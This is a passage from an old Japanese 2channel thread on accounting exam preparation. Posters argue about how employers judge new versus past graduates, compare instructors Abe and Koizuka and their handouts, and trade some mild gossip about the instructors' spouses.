144 :一般に公正妥当と認められた名無しさん:04/04/19 22:56 ID:???
ババ専のヘンタイがいっぱいいるな

145 :miho:04/04/22 22:19 ID:fu1za5qT
大学で何を学んだのか。幅広い知識や常識な無い?
社会について学ぶ意欲はなかったのか?
そもそも情報の取捨択一をする能力が無い?
何も考えないで生きてきて、社会を知らずに社会人になった・・
そんな学生にも社会人にもなれない中途半端な人間。

欲しいと思うのか?
本当に新卒=既卒と思うのか?
高卒でなく大卒を募集するのは、ある程度振るいを掛ける意図があるんだろう。
だから、大卒は高卒より高い評価を受けている場合が一般的だ。

では、既卒とは??
全体像では振るいから落ちた側と考える事に無理は無い。
だから、既卒は新卒より低い評価を受けている場合が一般的だ。

ここでゴネている人間には大きな問題がある。
相手の立場にたってものを考える事が出来ない。
だから相手の大きな利害に気がつかない。

大体、新卒しか応募しない会社が間違っていると思うなら、
行かなきゃいいだろ。間違っていない伸びる会社とやらに行けばいい。

で・・・・・・・・・・・・来る者拒まずの所は嫌がるんでしょ?
新卒しか応募しない会社が良い会社で、
既卒や高卒を応募する会社は避けてる奴ばかりだろ?

何でだ?理由を一つでも多く正直に挙げてみな。
それを見つめれば、相手の気持ちも理解できるだろう。



146 :一般に公正妥当と認められた名無しさん:04/05/14 23:38 ID:???
短答まとめのレジュメ、間違いが多くない?

147 :一般に公正妥当と認められた名無しさん :04/05/19 11:34 ID:???
阿部先生と小飯塚先生では、
教え方やレジュメはどんな違いがありますか?


148 :一般に公正妥当と認められた名無しさん:04/05/31 07:20 ID:???
阿部じゃダメだ・・・・・。 もうだめぽ・・。

149 :一般に公正妥当と認められた名無しさん:04/05/31 10:44 ID:UBe82N0t
アベレジュメ+TACの短答問題集で普通に8点とれたんだが、彼はそんなにダメか?
それとも、俺が商法をつかめてないだけなのか。
とりあえず俺は授業が早く終わるから好きなのだがw

150 :そうだべ:04/05/31 10:51 ID:nh9p1cYg
講師なんてだれでも同じだっちゅうね。自分の努力不足を学校や講師のせいにするな。

151 :一般に公正妥当と認められた名無しさん:04/05/31 21:18 ID:1cA2YXf4
こいつの嫁って濃い図化なんでしょ?

152 :一般に公正妥当と認められた名無しさん:04/06/01 02:47 ID:???
>>151
阿部の嫁は、受講生だった現在会計士の女性だよ。
こいづかの旦那は弁護士。



34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)